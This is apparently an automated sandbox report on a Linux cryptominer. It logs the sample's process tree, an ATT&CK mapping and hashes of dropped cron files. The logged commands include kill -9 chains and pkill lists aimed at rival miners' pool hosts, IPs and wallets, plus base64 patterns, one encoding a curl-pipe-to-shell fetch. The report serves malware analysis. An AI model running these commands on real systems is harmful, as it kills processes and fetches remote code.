/bin/grep
grep -v grep
2⤵
PID:1545

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:1544

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1553

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1552

/bin/grep
grep 83.220.169.247
2⤵
PID:1551

/bin/grep
grep -v grep
2⤵
PID:1550

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1549

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1558

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1557

/bin/grep
grep 51.38.203.146
2⤵
PID:1556

/bin/grep
grep -v grep
2⤵
PID:1555

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1554

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1563

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1562

/bin/grep
grep 144.217.45.45
2⤵
PID:1561

/bin/grep
grep -v grep
2⤵
PID:1560

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:1559

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1568

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1567

/bin/grep
grep 107.174.47.181
2⤵
PID:1566

/bin/grep
grep -v grep
2⤵
PID:1565

/bin/ps
ps aux
2⤵
PID:1564

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1573

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1572

/bin/grep
grep 176.31.6.16
2⤵
PID:1571

/bin/grep
grep -v grep
2⤵
PID:1570

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:1569

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1578

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1577

/bin/grep
grep mine.moneropool.com
2⤵
PID:1576

/bin/grep
grep -v grep
2⤵
PID:1575

/bin/ps
ps auxf
2⤵
- Reads CPU attributes
PID:1574

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1583

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1582

/bin/grep
grep pool.t00ls.ru
2⤵
PID:1581

/bin/grep
grep -v grep
2⤵
PID:1580

/bin/ps
ps auxf
2⤵
- Reads CPU attributes
PID:1579

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1588

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1587

/bin/grep
grep xmr.crypto-pool.fr:8080
2⤵
PID:1586

/bin/grep
grep -v grep
2⤵
PID:1585

/bin/ps
ps auxf
2⤵
PID:1584

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1593

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1592

/bin/grep
grep xmr.crypto-pool.fr:3333
2⤵
PID:1591

/bin/grep
grep -v grep
2⤵
PID:1590

/bin/ps
ps auxf
2⤵
PID:1589

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1598

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1597

/bin/grep
grep "[email protected]"
2⤵
PID:1596

/bin/grep
grep -v grep
2⤵
PID:1595

/bin/ps
ps auxf
2⤵
- Reads CPU attributes
PID:1594

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1603

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1602

/bin/grep
grep monerohash.com
2⤵
PID:1601

/bin/grep
grep -v grep
2⤵
PID:1600

/bin/ps
ps auxf
2⤵
PID:1599

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1608

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1607

/bin/grep
grep /tmp/a7b104c270
2⤵
PID:1606

/bin/grep
grep -v grep
2⤵
PID:1605

/bin/ps
ps auxf
2⤵
- Reads runtime system information
PID:1604

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1613

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1612

/bin/grep
grep xmr.crypto-pool.fr:6666
2⤵
PID:1611

/bin/grep
grep -v grep
2⤵
PID:1610

/bin/ps
ps auxf
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1609

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1618

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1617

/bin/grep
grep xmr.crypto-pool.fr:7777
2⤵
PID:1616

/bin/ps
ps auxf
2⤵
PID:1614

/bin/grep
grep -v grep
2⤵
PID:1615

/bin/grep
grep xmr.crypto-pool.fr:443
2⤵
PID:1621

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1623

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1622

/bin/grep
grep -v grep
2⤵
PID:1620

/bin/ps
ps auxf
2⤵
PID:1619

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1628

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1627

/bin/grep
grep stratum.f2pool.com:8888
2⤵
PID:1626

/bin/grep
grep -v grep
2⤵
PID:1625

/bin/ps
ps auxf
2⤵
- Reads runtime system information
PID:1624

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1633

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1632

/bin/grep
grep xmrpool.eu
2⤵
PID:1631

/bin/grep
grep -v grep
2⤵
PID:1630

/bin/ps
ps auxf
2⤵
PID:1629

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1637

/usr/local/sbin/kill
kill -9 1635
3⤵
PID:1638

/usr/local/bin/kill
kill -9 1635
3⤵
PID:1638

/usr/sbin/kill
kill -9 1635
3⤵
PID:1638

/usr/bin/kill
kill -9 1635
3⤵
PID:1638

/sbin/kill
kill -9 1635
3⤵
PID:1638

/bin/kill
kill -9 1635
3⤵
PID:1638

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1636

/bin/grep
grep xiaoyao
2⤵
PID:1635

/bin/ps
ps auxf
2⤵
PID:1634

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1642

/usr/local/sbin/kill
kill -9 1640
3⤵
PID:1643

/usr/local/bin/kill
kill -9 1640
3⤵
PID:1643

/usr/sbin/kill
kill -9 1640
3⤵
PID:1643

/usr/bin/kill
kill -9 1640
3⤵
PID:1643

/sbin/kill
kill -9 1640
3⤵
PID:1643

/bin/kill
kill -9 1640
3⤵
PID:1643

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1641

/bin/grep
grep xiaoxue
2⤵
PID:1640

/bin/ps
ps auxf
2⤵
PID:1639

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:1648

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1649

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1647

/bin/grep
grep "ESTABLISHED\\|SYN_SENT"
2⤵
PID:1646

/bin/grep
grep 46.243.253.15
2⤵
PID:1645

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1655

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:1654

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1653

/bin/grep
grep "ESTABLISHED\\|SYN_SENT"
2⤵
PID:1652

/bin/grep
grep 176.31.6.16
2⤵
PID:1651

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1661

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:1660

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1659

/bin/grep
grep "ESTABLISHED\\|SYN_SENT"
2⤵
PID:1658

/bin/grep
grep 108.174.197.76
2⤵
PID:1657

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1667

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:1666

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1665

/bin/grep
grep "ESTABLISHED\\|SYN_SENT"
2⤵
PID:1664

/bin/grep
grep 192.236.161.6
2⤵
PID:1663

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1673

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:1672

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1671

/bin/grep
grep "ESTABLISHED\\|SYN_SENT"
2⤵
PID:1670

/bin/grep
grep 88.99.242.92
2⤵
PID:1669

/usr/bin/pkill
pkill -f pastebin
2⤵
PID:1674

/usr/bin/pkill
pkill -f 185.193.127.115
2⤵
- Reads runtime system information
PID:1675

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1677

/usr/bin/pgrep
pgrep -f monerohash
2⤵
PID:1676

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1679

/usr/bin/pgrep
pgrep -f L2Jpbi9iYXN
2⤵
PID:1678

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1681

/usr/bin/pgrep
pgrep -f xzpauectgr
2⤵
- Reads runtime system information
PID:1680

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1683

/usr/bin/pgrep
pgrep -f slxfbkmxtd
2⤵
PID:1682

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1685

/usr/bin/pgrep
pgrep -f mixtape
2⤵
PID:1684

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1687

/usr/bin/pgrep
pgrep -f addnj
2⤵
PID:1686

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1689

/usr/bin/pgrep
pgrep -f 200.68.17.196
2⤵
PID:1688

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1691

/usr/bin/pgrep
pgrep -f IyEvYmluL3NoCgpzUG
2⤵
- Reads CPU attributes
PID:1690

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1693

/usr/bin/pgrep
pgrep -f KHdnZXQgLXFPLSBodHRw
2⤵
PID:1692

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1695

/usr/bin/pgrep
pgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS3
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1694

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1697

/usr/bin/pgrep
pgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo
2⤵
- Reads runtime system information
PID:1696

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1699

/usr/bin/pgrep
pgrep -f mwyumwdbpq.conf
2⤵
PID:1698

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1701

/usr/bin/pgrep
pgrep -f honvbsasbf.conf
2⤵
PID:1700

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1703

/usr/bin/pgrep
pgrep -f mqdsflm.cf
2⤵
PID:1702

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1705

/usr/bin/pgrep
pgrep -f stratum
2⤵
PID:1704

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1707

/usr/bin/pgrep
pgrep -f lower.sh
2⤵
PID:1706

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1709

/usr/bin/pgrep
pgrep -f ./ppp
2⤵
PID:1708

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1711

/usr/bin/pgrep
pgrep -f cryptonight
2⤵
PID:1710

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1713

/usr/bin/pgrep
pgrep -f ./seervceaess
2⤵
PID:1712

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1715

/usr/bin/pgrep
pgrep -f ./servceaess
2⤵
PID:1714

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1717

/usr/bin/pgrep
pgrep -f ./servceas
2⤵
PID:1716

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1719

/usr/bin/pgrep
pgrep -f ./servcesa
2⤵
PID:1718

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1721

/usr/bin/pgrep
pgrep -f ./vsp
2⤵
PID:1720

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1723

/usr/bin/pgrep
pgrep -f ./jvs
2⤵
- Reads runtime system information
PID:1722

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1725

/usr/bin/pgrep
pgrep -f ./pvv
2⤵
PID:1724

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1727

/usr/bin/pgrep
pgrep -f ./vpp
2⤵
PID:1726

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1729

/usr/bin/pgrep
pgrep -f ./pces
2⤵
- Reads CPU attributes
PID:1728

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1731

/usr/bin/pgrep
pgrep -f ./rspce
2⤵
PID:1730

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1733

/usr/bin/pgrep
pgrep -f ./haveged
2⤵
PID:1732

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1735

/usr/bin/pgrep
pgrep -f ./jiba
2⤵
PID:1734

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1737

/usr/bin/pgrep
pgrep -f ./watchbog
2⤵
PID:1736

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1739

/usr/bin/pgrep
pgrep -f ./A7mA5gb
2⤵
- Reads CPU attributes
PID:1738

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1741

/usr/bin/pgrep
pgrep -f kacpi_svc
2⤵
PID:1740

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1743

/usr/bin/pgrep
pgrep -f kswap_svc
2⤵
PID:1742

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1745

/usr/bin/pgrep
pgrep -f kauditd_svc
2⤵
PID:1744

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1747

/usr/bin/pgrep
pgrep -f kpsmoused_svc
2⤵
- Reads runtime system information
PID:1746

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1749

/usr/bin/pgrep
pgrep -f kseriod_svc
2⤵
- Reads CPU attributes
PID:1748

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1751

/usr/bin/pgrep
pgrep -f kthreadd_svc
2⤵
PID:1750

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1753

/usr/bin/pgrep
pgrep -f ksoftirqd_svc
2⤵
- Reads runtime system information
PID:1752

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1755

/usr/bin/pgrep
pgrep -f kintegrityd_svc
2⤵
PID:1754

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1757

/usr/bin/pgrep
pgrep -f jawa
2⤵
- Reads CPU attributes
PID:1756

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1759

/usr/bin/pgrep
pgrep -f oracle.jpg
2⤵
PID:1758

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1761

/usr/bin/pgrep
pgrep -f 45cToD1FzkjAxHRBhYKKLg5utMGEN
2⤵
PID:1760

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1763

/usr/bin/pgrep
pgrep -f 188.209.49.54
2⤵
- Reads CPU attributes
PID:1762

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1765

/usr/bin/pgrep
pgrep -f 181.214.87.241
2⤵
PID:1764

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1767

/usr/bin/pgrep
pgrep -f etnkFgkKMumdqhrqxZ6729U7bY8pzRjYzGbXa5sDQ
2⤵
PID:1766

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1769

/usr/bin/pgrep
pgrep -f 47TdedDgSXjZtJguKmYqha4sSrTvoPXnrYQEq2Lbj
2⤵
PID:1768

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1771

/usr/bin/pgrep
pgrep -f etnkP9UjR55j9TKyiiXWiRELxTS51FjU9e1UapXyK
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1770

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1773

/usr/bin/pgrep
pgrep -f servim
2⤵
PID:1772

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1775

/usr/bin/pgrep
pgrep -f kblockd_svc
2⤵
- Reads CPU attributes
PID:1774

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1777

/usr/bin/pgrep
pgrep -f native_svc
2⤵
PID:1776

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1779

/usr/bin/pgrep
pgrep -f ynn
2⤵
PID:1778

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1781

/usr/bin/pgrep
pgrep -f 65ccEJ7
2⤵
PID:1780

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1783

/usr/bin/pgrep
pgrep -f jmxx
2⤵
- Reads runtime system information
PID:1782

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1785

/usr/bin/pgrep
pgrep -f 2Ne80nA
2⤵
PID:1784

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1787

/usr/bin/pgrep
pgrep -f sysstats
2⤵
- Reads CPU attributes
PID:1786

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1789

/usr/bin/pgrep
pgrep -f systemxlv
2⤵
PID:1788

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1791

/usr/bin/pgrep
pgrep -f watchbog
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1790

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1793

/usr/bin/pgrep
pgrep -f OIcJi1m
2⤵
PID:1792

/usr/bin/pkill
pkill -f biosetjenkins
2⤵
- Reads CPU attributes
PID:1794

/usr/bin/pkill
pkill -f Loopback
2⤵
PID:1795

/usr/bin/pkill
pkill -f apaceha
2⤵
PID:1796

/usr/bin/pkill
pkill -f cryptonight
2⤵
- Reads runtime system information
PID:1797

/usr/bin/pkill
pkill -f stratum
2⤵
- Reads CPU attributes
PID:1798

/usr/bin/pkill
pkill -f mixnerdx
2⤵
PID:1799

/usr/bin/pkill
pkill -f performedl
2⤵
- Reads runtime system information
PID:1800

/usr/bin/pkill
pkill -f JnKihGjn
2⤵
- Reads CPU attributes
PID:1801

/usr/bin/pkill
pkill -f irqba2anc1
2⤵
PID:1802

/usr/bin/pkill
pkill -f irqba5xnc1
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1803

/usr/bin/pkill
pkill -f irqbnc1
2⤵
- Reads CPU attributes
PID:1804

/usr/bin/pkill
pkill -f ir29xc1
2⤵
PID:1805

/usr/bin/pkill
pkill -f conns
2⤵
PID:1806

/usr/bin/pkill
pkill -f irqbalance
2⤵
- Reads CPU attributes
PID:1807

/usr/bin/pkill
pkill -f crypto-pool
2⤵
PID:1808

/usr/bin/pkill
pkill -f XJnRj
2⤵
PID:1809

/usr/bin/pkill
pkill -f mgwsl
2⤵
PID:1810

/usr/bin/pkill
pkill -f pythno
2⤵
PID:1811

/usr/bin/pkill
pkill -f jweri
2⤵
PID:1812

/usr/bin/pkill
pkill -f lx26
2⤵
PID:1813

/usr/bin/pkill
pkill -f NXLAi
2⤵
PID:1814

/usr/bin/pkill
pkill -f BI5zj
2⤵
PID:1815

/usr/bin/pkill
pkill -f askdljlqw
2⤵
PID:1816

/usr/bin/pkill
pkill -f minerd
2⤵
- Reads CPU attributes
PID:1817

/usr/bin/pkill
pkill -f minergate
2⤵
PID:1818

/usr/bin/pkill
pkill -f Guard.sh
2⤵
PID:1819

/usr/bin/pkill
pkill -f ysaydh
2⤵
PID:1820

/usr/bin/pkill
pkill -f bonns
2⤵
PID:1821

/usr/bin/pkill
pkill -f donns
2⤵
PID:1822

/usr/bin/pkill
pkill -f kxjd
2⤵
PID:1823

/usr/bin/pkill
pkill -f Duck.sh
2⤵
- Reads CPU attributes
PID:1824

/usr/bin/pkill
pkill -f bonn.sh
2⤵
PID:1825

/usr/bin/pkill
pkill -f conn.sh
2⤵
PID:1826

/usr/bin/pkill
pkill -f kworker34
2⤵
PID:1827

/usr/bin/pkill
pkill -f kw.sh
2⤵
PID:1828

/usr/bin/pkill
pkill -f pro.sh
2⤵
PID:1829

/usr/bin/pkill
pkill -f polkitd
2⤵
- Reads CPU attributes
PID:1830

/usr/bin/pkill
pkill -f acpid
2⤵
- Reads CPU attributes
PID:1831

/usr/bin/pkill
pkill -f icb5o
2⤵
PID:1832

/usr/bin/pkill
pkill -f nopxi
2⤵
PID:1833

/usr/bin/pkill
pkill -f irqbalanc1
2⤵
- Reads runtime system information
PID:1834

/usr/bin/pkill
pkill -f minerd
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1835

/usr/bin/pkill
pkill -f i586
2⤵
PID:1836

/usr/bin/pkill
pkill -f gddr
2⤵
PID:1837

/usr/bin/pkill
pkill -f mstxmr
2⤵
PID:1838

/usr/bin/pkill
pkill -f ddg.2011
2⤵
- Reads CPU attributes
PID:1839

/usr/bin/pkill
pkill -f wnTKYg
2⤵
PID:1840

/usr/bin/pkill
pkill -f deamon
2⤵
PID:1841

/usr/bin/pkill
pkill -f disk_genius
2⤵
PID:1842

/usr/bin/pkill
pkill -f sourplum
2⤵
- Reads CPU attributes
PID:1843

/usr/bin/pkill
pkill -f polkitd
2⤵
PID:1844

/usr/bin/pkill
pkill -f nanoWatch
2⤵
PID:1845

/usr/bin/pkill
pkill -f zigw
2⤵
PID:1846

/usr/bin/pkill
pkill -f devtool
2⤵
PID:1847

/usr/bin/pkill
pkill -f devtools
2⤵
PID:1848

/usr/bin/pkill
pkill -f systemctI
2⤵
PID:1849

/usr/bin/pkill
pkill -f watchbog
2⤵
PID:1850

/usr/bin/pkill
pkill -f cryptonight
2⤵
PID:1851

/usr/bin/pkill
pkill -f sustes
2⤵
PID:1852

/usr/bin/pkill
pkill -f xmrig
2⤵
- Reads CPU attributes
PID:1853

/usr/bin/pkill
pkill -f xmrig-cpu
2⤵
- Reads CPU attributes
PID:1854

/usr/bin/pkill
pkill -f 121.42.151.137
2⤵
- Reads CPU attributes
PID:1855

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Credential Access

Discovery

Process Discovery

T1057

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/log_rot

Filesize
5B

MD5
727479ef7cedf30c03459bec7d87b0f0

SHA1
2082e7f715f058acab2398d25d135cf5f4c0ce41

SHA256
29872037c9573567744ef10ed2de57864ded7554c9fa2ef03fc1244c65794ba6

SHA512
4cb59d37f8481f9bb2745f494baa0910a68aad40ac2903ef1513547e091e1e772a5f9436f789ab91fcafb75b8a28c2112ede89004be41f33c01d936b542ca6ba

Download Submit
/var/mail/user

Filesize
847B

MD5
dcebeaac330d2fabb0d77fde9d219ee4

SHA1
e27fa8dfc8d846a7e0e8731afae14633b3dcecac

SHA256
f58f8a41828796433c48200976a7b2f922f67c9fedb2a2f8fa1689109d17ddf2

SHA512
c1443529466ac1e67edc35f6d2f91e30001f8c3f480f924069bb3b8c016f77743473cc713f2a1a0a030b167ce983c6a4499ebce5910dac78895f5744c99b0029

Download Submit
/var/mail/user

Filesize
1KB

MD5
ea4491af2baf99537f415d75ce06bd50

SHA1
85aef97785f274518b80c2931b6a71f8d4aa43c6

SHA256
1b0a85571f061a323b17190c02b41b4fadf96733dab0414675e14c543eb123ad

SHA512
2e52cdf91e9c727675d4ee338d7ec988d258e9454a2bb50ded4380a3100a28dbf3919cde7baa03bd14996c17f305eb7197ce74618a03d560da9b6a34b4b6025d

Download Submit
/var/spool/cron/crontabs/tmp.8crptv

Filesize
175B

MD5
64bbc8c2f30b4353e275d53b8b29bf8b

SHA1
73ac1c615ae1deae8e9d6714a739c13616085194

SHA256
103692ccd7d1789fcd45ee9b7f5da073f56db5773b5140234e5da46ecfec54a4

SHA512
0a6a22408a63881d188956c1d90f0111fbe83efaed93548549bf16224dbe30ab11b1976c47a32ee3198120750a88097c8977601c638a241c20050f1a207669dd

Download Submit
/var/spool/cron/crontabs/tmp.Kl4d2H

Filesize
318B

MD5
9fb2950d011536371a8ed94f346fba9d

SHA1
94e4f20eb7ea8265ff1aa30ee5414ee8113514cc

SHA256
1a8bd08e467972ec209c1c12bd9374fc1bb11e411e5a7cb44c378eab27bd0077

SHA512
a68c0151d1bba21dc89efd12e7b75ec1900697fe178bb4a6f34ed605798351cddc4b4af1a679bd279ffb0a43d00852244eb2a569de4ac6cf0b26e1fc8e4687a4

Download Submit
/var/spool/cron/crontabs/tmp.WPicki

Filesize
175B

MD5
791bcc0af7f62868bd6457e678894f0a

SHA1
356185cd761b9943854428f29aa650e764bd557a

SHA256
8b34681a3280382654cf79c53dcfcb6e7ef382f9e553cef0d8bf08ee436d9431

SHA512
e19f79bfbb3377e9f3bef984c139d7699662389aee24df1159f997aa744ce4aeb59c4ba87438aebeecb33edf226d1ae7ed2d7a222a50693c7e9fcd42d1a5caae

Download Submit
/var/spool/cron/crontabs/tmp.mvue5i

Filesize
175B

MD5
7d83e82a484583fe80a59fd588042dcf

SHA1
cd5fdd995d99c06ae6b28570780ff920b9d17e0d

SHA256
72afc7ef3fc9db65561135ce9bffce0500f250e2c0599c548094dd6b2f08eed0

SHA512
8b7d50ead6596cce4916cfd0aee1911017407f01d3786ac65778dd31c3f14ade842ff9429a75fa178cda41001d87bdc45a7f68b77c4f1a8e6529bf52b58d788c

Download Submit
/var/spool/cron/crontabs/tmp.oitc0e

Filesize
175B

MD5
7be4ec7ad7805d18a824186ce3d1863d

SHA1
cbd4235e4eaafbba0087a91ad3b560c8a47d7f6b

SHA256
fd79847a1e1cc7e1f2cb4866b5a9edcdab6ec32ef05a2eea71e8723f85584f48

SHA512
0347b26a2d2c5bed86668057ed6639bc9c24e26f469f5aad4cc65caa2b45034d0615483220ee1a9acbba6bbb3f9bceb1346f5640e0d14e30b2eb3e4354752b8f

Download Submit
/var/spool/exim4/input/1suqJW-0000Bx-7D-D

Filesize
130B

MD5
92023ffcc89a077de23daa13cf00ee72

SHA1
2139624bf5f1ec5b6f5fa9d7d2a783013d40d9dc

SHA256
ea1059fd3073e6ec6b604142267f47d331001a78e401a916f14699a696df1f3c

SHA512
a00178a0a9bf84df512faef063ac0cf5b5ac5de95c4cf6f91a64279ea835c0ea03f1fd7d2a6e1ea083d58948098d3999f8e90bc940919972d41b57bc6ab9d963

Download Submit
/var/spool/exim4/input/1suqJW-0000C1-5z-D

Filesize
147B

MD5
4e8d11e630ab98dc2824c77b3c2ce3cb

SHA1
49809c4d34dd8207c9ca69ffc3138eff7a836f2c

SHA256
9e33721d155cc6145a2eb861f2d5d710fe02f00f5b6cceee7f2a69c3d594aaad

SHA512
d7b745a0bbff9af313d44a79d2210ab8883a8722129418c60b1bb1d600736e4fd75b6548b98c086ec5e3b2660e217327f9bbf2b023e67957ac119cac81715fa2

Download Submit
/var/spool/exim4/input/1suqJW-0000C1-5z-J

Filesize
34B

MD5
d7d96d63d643a4ce3e408eba7dfcedc5

SHA1
c53607f95c5c57beafc1d8266646797a035f76ea

SHA256
21db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159

SHA512
703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3

Download Submit
/var/spool/exim4/input/hdr.741

Filesize
918B

MD5
b9e9cd08e80b7c91b54dfb19d57f318c

SHA1
720115ffaeb62f3318cdb2ae90e734ce33335804

SHA256
cb687d50f340149879491d381c55764968dec74f2de03256e4db19818a16d36d

SHA512
8cbedb0917b7584a44d3ad510f100d53875619b01d78d63bfe3e85c0bc60c2440cb9ecb92e912c32c02f30a4b88f3555ec1872dc21ea689437b8b5d8861dd62b

Download Submit
/var/spool/exim4/input/hdr.745

Filesize
918B

MD5
d20e8e626a633377920d122a1ac48f04

SHA1
0acfec76cffbc0f655fc76ecd27a2e006b3255a8

SHA256
dc8cf67a5129e2d8275fa27e118135a2799d253d4da9830e820387a9e35a3dbf

SHA512
